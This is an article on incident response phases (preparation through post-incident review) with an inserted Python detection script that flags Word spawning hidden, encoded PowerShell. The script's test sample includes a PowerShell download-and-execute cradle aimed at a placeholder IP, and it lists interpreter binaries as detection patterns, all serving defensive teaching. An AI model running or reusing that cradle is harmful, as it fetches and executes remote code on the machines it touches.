
Incident Response and Management

A successful approach to incident response and management ensures that an organization is set up to protect its information.

This is achieved by developing and implementing an incident response plan. With that in place, organizations are able to protect, detect, and respond as quickly as possible to a service disruption. The employees in the Security Operations Center (SOC) who are tasked with following the incident response plan bear responsibility for remediating any potential breach as quickly as possible. The following diagram shows the most commonly adopted incident response plan approach, which this article details phase by phase:

Phase 1 – preparation

The preparation phase is the starting point of an incident response plan. It covers all of the activities that are performed before a cybersecurity incident occurs. Central to this phase is developing the incident response plan itself. What's important to understand is that an incident response plan isn't a document created once and never looked at again; it becomes a living document inside the security operations team.

When organizations start writing an incident response plan, it often gives them the opportunity to reassess their current security controls and compare them to industry and vendor best practices. It allows them to identify unknown gaps and security weaknesses they were not aware of. As the organization matures and handles more cybersecurity incidents, there will be lessons learned, which allow the organization to further optimize the incident response plan.


Regardless of how many cyberattacks and service disruptions the individuals in the team might have experienced, there’s always new learning available.

Phase 2 – detection and analysis

Detection and analysis is the phase in which the security operations team determines whether there is a true cybersecurity incident and, once it is confirmed, quickly establishes the scope of the breach. The team needs to be able to tell quickly whether a specific activity was performed by an actual employee or by a threat actor trying to mimic the behavior of an employee. As an example, Microsoft Word launching on an endpoint does not by itself mean that a threat actor is doing anything: Word is used by almost every organization in the world, and the chance that this individual activity is malicious is low. However, when analysis shows that Microsoft Word is executing a PowerShell script in the background, the activity is far more suspicious, because a document editor has little legitimate reason to launch a script interpreter. This is just one of thousands of examples of the level of detail that needs to be analyzed.
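To make the Word-and-PowerShell example concrete, here is an added illustration (not code from the original post) of the parent/child process check an analyst or a detection rule applies in this phase. It runs over a few constructed process-creation records shaped like Sysmon Event ID 1 fields (the host names, user names, paths, IP address and command lines are made up), flags an Office application spawning a script interpreter, decodes a PowerShell -EncodedCommand payload so the analyst can see what it actually does, and summarizes the affected hosts and accounts, which is the first scoping question the team has to answer:

```python
"""Parent/child process-chain check for the detection-and-analysis phase.

Added example, not code from the original post. SAMPLE_EVENTS are constructed
records shaped like Sysmon Event ID 1 (process creation) fields; the hosts,
users, paths, IP address and command lines are hypothetical.
"""
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Office applications that open documents and have little reason to launch interpreters.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Script hosts and living-off-the-land binaries a malicious macro typically spawns.
SCRIPT_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                   "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# Payload for the constructed malicious event: powershell.exe expects -EncodedCommand
# as base64 of the UTF-16LE script text, so the sample is built the same way.
_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a.ps1')"
_ENCODED = base64.b64encode(_STAGER.encode("utf-16le")).decode("ascii")

SAMPLE_EVENTS: List[Dict[str, str]] = [
    # Benign: the user opens Word from Explorer.
    {"host": "WS-0142", "user": "CORP\\jsmith",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r'"WINWORD.EXE" /n "C:\Users\jsmith\Documents\budget.docx"'},
    # Suspicious: Word spawns a hidden PowerShell with an encoded command.
    {"host": "WS-0142", "user": "CORP\\jsmith",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + _ENCODED},
    # Benign: an admin runs a maintenance script from Explorer.
    {"host": "WS-0207", "user": "CORP\\akhan",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
]


@dataclass
class Alert:
    host: str
    user: str
    parent: str
    child: str
    severity: str
    decoded_command: Optional[str] = None


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (Sysmon logs full image paths)."""
    return path.rsplit("\\", 1)[-1].lower()


# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...),
# so match "-e<letters>" and check that it prefixes the full parameter name.
_ENC_FLAG = re.compile(r"-(e[a-z]*)\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of an -EncodedCommand argument, or None if absent or invalid."""
    for flag, payload in _ENC_FLAG.findall(cmdline):
        if not "encodedcommand".startswith(flag.lower()):
            continue
        try:
            return base64.b64decode(payload, validate=True).decode("utf-16le")
        except ValueError:  # bad base64 or not UTF-16LE: treat as not decodable
            return None
    return None


def detect_office_spawn(events: List[Dict[str, str]]) -> List[Alert]:
    """Flag process creations where an Office app is the parent of a script host."""
    alerts: List[Alert] = []
    for ev in events:
        parent = basename(ev["ParentImage"])
        child = basename(ev["Image"])
        if parent not in OFFICE_PARENTS or child not in SCRIPT_CHILDREN:
            continue
        cmd = ev["CommandLine"]
        decoded = decode_encoded_command(cmd)
        hidden = re.search(r"-w(?:indowstyle)?\s+hidden", cmd, re.IGNORECASE) is not None
        # A hidden window or an encoded payload is the classic macro-dropper shape;
        # the bare parent/child pair alone still deserves an analyst's attention.
        severity = "high" if (decoded or hidden) else "medium"
        alerts.append(Alert(ev["host"], ev["user"], parent, child, severity, decoded))
    return alerts


def scope(alerts: List[Alert]) -> Dict[str, List[str]]:
    """Hosts and accounts touched by the alerts: the first scoping question."""
    return {"hosts": sorted({a.host for a in alerts}),
            "users": sorted({a.user for a in alerts})}


if __name__ == "__main__":
    found = detect_office_spawn(SAMPLE_EVENTS)
    for a in found:
        print(f"[{a.severity}] {a.host} {a.user}: {a.parent} -> {a.child}")
        if a.decoded_command:
            print("    decoded command:", a.decoded_command)
    print("scope:", scope(found))
```

Run stand-alone, the script reports one high-severity alert on WS-0142 for CORP\jsmith with the decoded download cradle, and no alert for the two benign records: the same interpreter launched from Explorer with a -File argument is exactly the kind of activity the paragraph says must be told apart from the malicious one. In a real SOC the parent/child lists would be tuned against the organization's own baseline, since some line-of-business add-ins do legitimately spawn cmd.exe or rundll32.exe.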

Phase 3 – containment

The containment phase is one of the most important phases of the incident response plan. It is very likely to cause service disruption, but it is essential in order to ensure that no further damage is caused.

In this phase, the security team attempts to contain the situation. The risk of not containing it and simply continuing to run operations is too high: the damage can grow not only in the short term but also in the mid and long term, and it can grow exponentially. Consider the scenario where a cyberattack isn't contained: the security team recovers an IT service and, as soon as it's recovered, it's compromised again. This happens because the cybersecurity incident was not contained before the recovery was attempted.

Phase 4 – eradication and recovery

Eradication and recovery are two separate processes that can potentially happen at the same time. With eradication, the organization ensures that it removes all of the artifacts and components associated with the cybersecurity incident. Good examples of eradication are deleting the malware, deleting the emails from the phishing campaign that were the entry point for the cyberattack, and disabling compromised user accounts.

The recovery process is the one the organization will always push the security team to perform as fast as possible. But it's important not to rush: stay calm and follow the incident response plan. Remember, when recovering an environment, you want to make sure that the threat actor can't breach it again seconds after recovery.

This step includes restoring the systems to an operational state, but it also covers hardening the systems so that the same attack pattern can't succeed again.

Phase 5 – post-incident activity

As much as it's important to end the service disruption and get the business operating again, it's also important to perform a post-mortem after resolving the cybersecurity incident.

Cybersecurity is a continuous learning space, and only by learning from the past can organizations truly mature in their cybersecurity practice. In the post-incident activity phase, the team reviews the cybersecurity incident to understand in depth how the attack happened in the first place, what could have been done to prevent it, and how to improve the approach to incident response. The findings of the post-incident activity phase directly shape how phase 1 (preparation) is performed going forward.

About the author

Dr. Erdal Ozkaya is a leading Cybersecurity Professional with business development, management, and academic skills who focuses on securing cyberspace and sharing his real-life skills as a Security Adviser, Speaker, Lecturer, and Author. Erdal is known to be passionate about reaching communities, creating cyber-awareness campaigns, and leveraging new and innovative approaches and technologies to holistically address the information security and privacy needs of every person and organization in the world. He has authored many cybersecurity books as well as security certification courseware and exams for different vendors. Erdal has the following qualifications: Doctor of Philosophy in Cybersecurity, Master of Computing Research, Master of Information Systems Security, Bachelor of Information Technology, Microsoft Certified Trainer, Microsoft Certified Learning Consultant, ISO 27001 Auditor & Implementer, Certified Ethical Hacker (CEH), Certified Ethical Instructor, and Licensed Penetration Tester. He is an award-winning technical expert and speaker. His recent awards are: CISO Top 50 Award by Security ME Adviser Magazine & Tahawultech.com (2020), Legend Cybersecurity Pro by GEC Media (2019), Hall of Fame, CISO Magazine (2019), Cybersecurity Influencer of the Year (2019), CISO Magazine Cyber Security Professional of the Year MEA (2019), Microsoft Circle of Excellence Platinum Club (2017), NATO Center of Excellence (2016), Security Professional of the Year by MEA Channel Magazine (2015), Professional of the Year Sydney (2014), and many speaker-of-the-year awards at conferences. He also holds Global Instructor of the Year awards from EC-Council, Microsoft, and Logical Operations.

Erdal is also a part-time lecturer at Australia's Charles Sturt University. He has built and managed CEO IT from scratch into a multi-million-dollar national training and IT solutions center. With the skills he gained there, he repeated that success at KEMP Technologies, where he was tasked to single-handedly manage the ANZ region and then build the business in the Asia Pacific region. From there he joined Secunia as CISO in Dubai and extended his experience in the Middle East and Africa. At the beginning of 2016 he joined Microsoft as a Cybersecurity Architect / Trusted Security Advisor responsible for the EMEA region. Erdal currently works at Standard Chartered Bank as Head of Information and Cyber Security with Managing Director status.

Erdal's social media accounts: Twitter https://twitter.com/Erdal_Ozkaya, LinkedIn https://www.linkedin.com/in/erdalozkaya/, Facebook https://www.facebook.com/CyberSec.Advisor/, Instagram https://www.instagram.com/drerdalozkaya/, Amazon https://www.amazon.com/-/e/B0796D9KQ4
